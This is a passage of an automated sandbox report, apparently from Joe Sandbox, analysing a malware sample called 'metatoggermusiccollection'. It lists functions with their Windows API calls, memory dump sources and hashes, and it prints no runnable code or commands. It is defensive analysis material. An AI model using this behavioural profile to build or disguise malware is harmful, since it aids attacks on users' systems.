                                                                              • Part of subcall function 02AD3D7E: htonl.WS2_32(00000000), ref: 02AD3DB9
                                                                              • Part of subcall function 02AD3D7E: htonl.WS2_32(00000000), ref: 02AD3DC0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: htonl$H_prologhtons
                                                                            • String ID:
                                                                            • API String ID: 4039807196-0
                                                                            • Opcode ID: a96be4cfc8755c017e3ff1b61579fe7678a7d6bbcc8266159b4c58961ade454e
                                                                            • Instruction ID: 426384c9c21e62e2104034c2ca77c889ea4da77d103a478968d196dbd3a853c7
                                                                            • Opcode Fuzzy Hash: a96be4cfc8755c017e3ff1b61579fe7678a7d6bbcc8266159b4c58961ade454e
                                                                            • Instruction Fuzzy Hash: 968167B5D0424ECFCF05DFA8D190AEEBBB5AF08314F50819AD812B7240EB355A09CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B1B0CF Relevance: 1.6, APIs: 1, Instructions: 94fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002B0A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B0A000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2b0a000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 2b75b581af97edd669f649b30272867d2ed96aa0e0b886ab7eaca5550e5ae247
                                                                            • Instruction ID: 8cc45cbad4b8c75cd1976235e1cf580a3129977c76c01cbbe311f4919710fb2d
                                                                            • Opcode Fuzzy Hash: 2b75b581af97edd669f649b30272867d2ed96aa0e0b886ab7eaca5550e5ae247
                                                                            • Instruction Fuzzy Hash: F421F5B390C6106BE7057A2EDC84639B7E9EFD8620F1A453DDBC583744E97168058692
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ADE8F4 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02ADE8F9
                                                                              • Part of subcall function 02AD1A01: TlsGetValue.KERNEL32 ref: 02AD1A0A
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologValue
                                                                            • String ID:
                                                                            • API String ID: 3700342317-0
                                                                            • Opcode ID: 78dcacc0f6d8c91ccb8586437e05bc36b8659a78d8a68ae2d9e752f51bf7f295
                                                                            • Instruction ID: afe918202234038a8575eb29d4e710806a347a8bd447fad5bdf1e10714416b62
                                                                            • Opcode Fuzzy Hash: 78dcacc0f6d8c91ccb8586437e05bc36b8659a78d8a68ae2d9e752f51bf7f295
                                                                            • Instruction Fuzzy Hash: 7D214FB1D05209AFDB00DFA4D640AEEBBF9EF48310F10451AE519A7240DB75A900CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD33B2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02AD33CC
                                                                              • Part of subcall function 02AD32AB: __EH_prolog.LIBCMT ref: 02AD32B0
                                                                              • Part of subcall function 02AD32AB: RtlEnterCriticalSection.NTDLL(?), ref: 02AD32C3
                                                                              • Part of subcall function 02AD32AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02AD32EF
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                            • String ID:
                                                                            • API String ID: 1518410164-0
                                                                            • Opcode ID: d3c19713528e9f596c606396f5da6703446adfe1c86a7ec527514f4f2506b1af
                                                                            • Instruction ID: 695757a48db764830bfef908cb4db9141478f839fc699aa788d9e80bf9224a5a
                                                                            • Opcode Fuzzy Hash: d3c19713528e9f596c606396f5da6703446adfe1c86a7ec527514f4f2506b1af
                                                                            • Instruction Fuzzy Hash: CA016D74655606AFDB048F59D885B55BBA9FF44320B10835AE829872C0EF70E821CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B4020E Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteFileA.KERNELBASE(4660960D), ref: 02B6E376
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002B0A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B0A000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2b0a000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteFile
                                                                            • String ID:
                                                                            • API String ID: 4033686569-0
                                                                            • Opcode ID: e0da2dffa4f581ab40d4b91ad567db9e8151d84cf028e1dfece08c4088839a33
                                                                            • Instruction ID: ea66606e938b2d913e4bc6a3beedbbdc25fa7687f0eb5de0cebff8d7a3184252
                                                                            • Opcode Fuzzy Hash: e0da2dffa4f581ab40d4b91ad567db9e8151d84cf028e1dfece08c4088839a33
                                                                            • Instruction Fuzzy Hash: 940108F551CA10ABD3197F0AD885ABDFBE8EF94311F06482DD2C582710E6705480CB97
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004026E2 Relevance: 1.5, APIs: 1, Instructions: 39libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExA.KERNELBASE(?,00000000), ref: 0040B8D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 938891c41c19957031571cb3cd7cef40cfb462982efdf7795ef8d5ecdca5ac57
                                                                            • Instruction ID: 6231b04622782da76f8fb29558b74f8e19658c67226029681e8db2cc7872a652
                                                                            • Opcode Fuzzy Hash: 938891c41c19957031571cb3cd7cef40cfb462982efdf7795ef8d5ecdca5ac57
                                                                            • Instruction Fuzzy Hash: 3AF09035214306DBEB10EE64CD84B7237A4EB14340F64843BEC46EA2D1E7B8D9429B9E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ADE484 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02ADE489
                                                                              • Part of subcall function 02AD26DB: RtlEnterCriticalSection.NTDLL(?), ref: 02AD2706
                                                                              • Part of subcall function 02AD26DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02AD272B
                                                                              • Part of subcall function 02AD26DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02AF5A93), ref: 02AD2738
                                                                              • Part of subcall function 02AD26DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02AD2778
                                                                              • Part of subcall function 02AD26DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02AD27D9
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                            • String ID:
                                                                            • API String ID: 4293676635-0
                                                                            • Opcode ID: 398d1687fddcbf6d80388fbf542618dbfd8705c466550fc8e99e98b5effc094c
                                                                            • Instruction ID: f4d8e429c841156813b700df7a390e8c1cc8f18c1c568bedd3978cb3cc1ec007
                                                                            • Opcode Fuzzy Hash: 398d1687fddcbf6d80388fbf542618dbfd8705c466550fc8e99e98b5effc094c
                                                                            • Instruction Fuzzy Hash: BB01D0B4910B04DFC358CF4AC24498AFBF4EF88710B01C5AEA4499B321EB759A40CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ADE263 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02ADE268
                                                                              • Part of subcall function 02AE3A8F: _malloc.LIBCMT ref: 02AE3AA7
                                                                              • Part of subcall function 02ADE484: __EH_prolog.LIBCMT ref: 02ADE489
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$_malloc
                                                                            • String ID:
                                                                            • API String ID: 4254904621-0
                                                                            • Opcode ID: 3997100394e335a6d9d9f82a4d069a73cfd6b3d5e810f230f4a67347b9f833db
                                                                            • Instruction ID: acb7051d043fb2b553f9a4e011dd46e149f14d79c7c3a5694a28fd66d1971349
                                                                            • Opcode Fuzzy Hash: 3997100394e335a6d9d9f82a4d069a73cfd6b3d5e810f230f4a67347b9f833db
                                                                            • Instruction Fuzzy Hash: 78E0C270A40145ABCF4CEFA8DA107BDB7A6EF08300F0043ADB80AD7640DF7199008A44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AE3395 Relevance: 1.5, APIs: 1, Instructions: 19COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 02AE5B9A: __getptd_noexit.LIBCMT ref: 02AE5B9B
                                                                              • Part of subcall function 02AE5B9A: __amsg_exit.LIBCMT ref: 02AE5BA8
                                                                              • Part of subcall function 02AE33D6: __getptd_noexit.LIBCMT ref: 02AE33DA
                                                                              • Part of subcall function 02AE33D6: __freeptd.LIBCMT ref: 02AE33F4
                                                                              • Part of subcall function 02AE33D6: RtlExitUserThread.NTDLL(?,00000000,?,02AE33B6,00000000), ref: 02AE33FD
                                                                            • __XcptFilter.LIBCMT ref: 02AE33C2
                                                                              • Part of subcall function 02AE8CD4: __getptd_noexit.LIBCMT ref: 02AE8CD8
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                            • String ID:
                                                                            • API String ID: 1405322794-0
                                                                            • Opcode ID: 751993d4456234871d9c67a9fe478827eb6e8deaa95785f6aa96d50f54e92f88
                                                                            • Instruction ID: 8efb8c3bece636a26dab3b303e080d1c96223200be9798013ba2e0987bc15240
                                                                            • Opcode Fuzzy Hash: 751993d4456234871d9c67a9fe478827eb6e8deaa95785f6aa96d50f54e92f88
                                                                            • Instruction Fuzzy Hash: 96E0ECB19856059FEF08BBA4DA45E6E7776AF44302F210188E2039B2B0DF7899419F21
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040B8CE Relevance: 1.5, APIs: 1, Instructions: 18libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExA.KERNELBASE(?,00000000), ref: 0040B8D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 6136a3877e6e2f0dd4123d90e237bad55ebe4cd6e2fa0a15503b3406c486cffe
                                                                            • Instruction ID: 868a890bdf16fbdb6b0f6a21b24728291ff6892bb476c2b181fa5c28a3fa7e1e
                                                                            • Opcode Fuzzy Hash: 6136a3877e6e2f0dd4123d90e237bad55ebe4cd6e2fa0a15503b3406c486cffe
                                                                            • Instruction Fuzzy Hash: ADD05E3460820ADBDB109F20CD8866936A0EB253407004676EC07AE294EBB4D9028A89
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040B00D Relevance: 1.5, APIs: 1, Instructions: 16registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegCreateKeyExA.KERNELBASE ref: 0040B00D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 500ff6ea7e252baa5171073ac6586a82d290a4070e409aae7b418b8824e4eb1f
                                                                            • Instruction ID: c2c62dfceaa2ca30394ff8bbcbca8809a465483e77cd5c694646456b11ff8d88
                                                                            • Opcode Fuzzy Hash: 500ff6ea7e252baa5171073ac6586a82d290a4070e409aae7b418b8824e4eb1f
                                                                            • Instruction Fuzzy Hash: 1FD0A77490810297D71056216E9DE65316CA704304F500236BE09B21D2E7B88956555E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B15AF3 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002B0A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B0A000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2b0a000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: f5b8ed3e661a1a7fb57cf7db96836a696ed5479aa53492ec994b1cd9bae07e51
                                                                            • Instruction ID: d93985f6cc278e52f0ced974abd4c508a4694a177623bcde0b6895087a29a9b3
                                                                            • Opcode Fuzzy Hash: f5b8ed3e661a1a7fb57cf7db96836a696ed5479aa53492ec994b1cd9bae07e51
                                                                            • Instruction Fuzzy Hash: 51D067B141C715CFD3953F6898C5379BBE4AB08700F42096CD6C592641EA345984CB9A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004024EC Relevance: 1.5, APIs: 1, Instructions: 12synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040BB0F
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 24740636-0
                                                                            • Opcode ID: 06cd4e1e2b5318ed55d10e10e6ab17b413496d7c215a766dc1cd46bbc1e42b35
                                                                            • Instruction ID: ef0758628b503f26ab19731c94afa928a07457d65258333e7402194836c43395
                                                                            • Opcode Fuzzy Hash: 06cd4e1e2b5318ed55d10e10e6ab17b413496d7c215a766dc1cd46bbc1e42b35
                                                                            • Instruction Fuzzy Hash: EFD0122110C091FFC65687A48C649A13BB8DD063553294AB3A463725E1C63C2016E36F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040BB7F Relevance: 1.5, APIs: 1, Instructions: 10registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegCloseKey.KERNELBASE(?), ref: 0040BBA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: 74f322b8ff5043d62f76b6d4d9924e6e430d0f9e420fe5ff5ec3609d02c6becc
                                                                            • Instruction ID: bc9fcb05ae8656bc41f953a4491f85b4eae85a5287a10dbca2abb42cf387f289
                                                                            • Opcode Fuzzy Hash: 74f322b8ff5043d62f76b6d4d9924e6e430d0f9e420fe5ff5ec3609d02c6becc
                                                                            • Instruction Fuzzy Hash: 07C012308080029BD71547649D08624BF70FB013007114061D183349A3C3366453A78E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040B72C Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 4208be6c401ace8eaf57d9faaff6df1abccb720293123bf60b5afa5c9f998a5b
                                                                            • Instruction ID: 7a8fb3575aad36e99e01433973275fcd838bbbcd725035783ab06971788b140c
                                                                            • Opcode Fuzzy Hash: 4208be6c401ace8eaf57d9faaff6df1abccb720293123bf60b5afa5c9f998a5b
                                                                            • Instruction Fuzzy Hash: 5D017B72849596DBC7228F619D8CAA53F20EB05300B2C47FAE581769A2C33AD917D7CD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040B5E6 Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000003E8), ref: 0040B673
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 4923c56613507f6154e6695a1a0a79be905ca74f5fc4bb1a8d63dae53b35cfd4
                                                                            • Instruction ID: c46616b9988c65e90fc05240c7557c229c01b71e50158476c3ddc31f6f3b184e
                                                                            • Opcode Fuzzy Hash: 4923c56613507f6154e6695a1a0a79be905ca74f5fc4bb1a8d63dae53b35cfd4
                                                                            • Instruction Fuzzy Hash: 22017D761987109DC721CA384D46D923B68EE22700B69096BF142BF1E2D33B950BD6CF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AE20A0 Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 02AE1550: OpenEventA.KERNEL32(00100002,00000000,00000000,3156A85A), ref: 02AE15F0
                                                                              • Part of subcall function 02AE1550: CloseHandle.KERNEL32(00000000), ref: 02AE1605
                                                                              • Part of subcall function 02AE1550: ResetEvent.KERNEL32(00000000,3156A85A), ref: 02AE160F
                                                                              • Part of subcall function 02AE1550: CloseHandle.KERNEL32(00000000,3156A85A), ref: 02AE1644
                                                                            • TlsSetValue.KERNEL32(00000025,?), ref: 02AE20EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseEventHandle$OpenResetValue
                                                                            • String ID:
                                                                            • API String ID: 1556185888-0
                                                                            • Opcode ID: 34e67e3f12a904ee02a4c0a836bde09c0d092ea3c3fa11d6efc1cf0b174418ec
                                                                            • Instruction ID: 4ce13313124d8e8f8d42e18ea1cd6befaae05c8dd8d17938add9c824b5815ada
                                                                            • Opcode Fuzzy Hash: 34e67e3f12a904ee02a4c0a836bde09c0d092ea3c3fa11d6efc1cf0b174418ec
                                                                            • Instruction Fuzzy Hash: EB018471A80214ABE710DF58DC45F5EBBF8FB05760F104756F42AD3280DB759D108AA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040226E Relevance: 1.3, APIs: 1, Instructions: 38stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 1586166983-0
                                                                            • Opcode ID: e02f8efbac426ba64e9b08b55a62167551dd3e5192ad7b41aa824c6377f46e98
                                                                            • Instruction ID: b9dd472658aa79e8713cc1c43643f3a09ee23d5b7ec078f99577b19effab2280
                                                                            • Opcode Fuzzy Hash: e02f8efbac426ba64e9b08b55a62167551dd3e5192ad7b41aa824c6377f46e98
                                                                            • Instruction Fuzzy Hash: 54F09A3260C2538EC74216656A082B67BA0AA51710B38847B9C87B51D2DBBC485376AF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040B2EF Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNELBASE(?), ref: 0040B2FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 18c128e7e1d3a70a9118cf2a5e811f5c9c954107df949b2efcfa9b5db2156fc9
                                                                            • Instruction ID: 30eba2562c68e96c98e1aa31e98657024e3942590acf667e384b09b50b6edfb8
                                                                            • Opcode Fuzzy Hash: 18c128e7e1d3a70a9118cf2a5e811f5c9c954107df949b2efcfa9b5db2156fc9
                                                                            • Instruction Fuzzy Hash: 0BC08C31100901E7C7000B348E0C181B728FF007003260132EC03709A0C37E542DAAAD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040B6EC Relevance: 1.3, APIs: 1, Instructions: 8sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 7555949166ef3385efc278390852ec46746e317434f07fbea60302d659f1b0da
                                                                            • Instruction ID: 130aa393355d1d3f730376283a7cbe41ada4335551948cec256614a457e6477e
                                                                            • Opcode Fuzzy Hash: 7555949166ef3385efc278390852ec46746e317434f07fbea60302d659f1b0da
                                                                            • Instruction Fuzzy Hash: 43C08C30805940DBD2164B306E08B143B30E721700F200964E24320CE1833A6025D609
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402322 Relevance: 1.3, APIs: 1, Instructions: 8sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000003E8), ref: 0040B673
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 2f3bbf81509a6403ce4eb6566e4c2682b327bd7fda14c88d04de4b44162c8b52
                                                                            • Instruction ID: daca3ffbd5ff764758662f534c55e9e56749cc2f8a70cc823d56b72693b939bd
                                                                            • Opcode Fuzzy Hash: 2f3bbf81509a6403ce4eb6566e4c2682b327bd7fda14c88d04de4b44162c8b52
                                                                            • Instruction Fuzzy Hash: 3BB092305C8B01FEE10107A09E59F386621E720B00F220623A703780E08BBA0663BA8F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040B66D Relevance: 1.3, APIs: 1, Instructions: 7sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000003E8), ref: 0040B673
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 00bf01a9b72d648d1cebd4848209a3c99be8b6c7cbdd3909c15e8f7d0f3832f1
                                                                            • Instruction ID: a3b9e5ac81abcb523932f8946054f8d2fd83f5673244a20f1dfd6dc4be3b2ef3
                                                                            • Opcode Fuzzy Hash: 00bf01a9b72d648d1cebd4848209a3c99be8b6c7cbdd3909c15e8f7d0f3832f1
                                                                            • Instruction Fuzzy Hash: 4EB092B1488A01AAE6010B905A2EB207622F720B00F120A22E303380E143BA0222ABCE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 02AE08B8 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02AE08E2
                                                                            • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02AE08EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
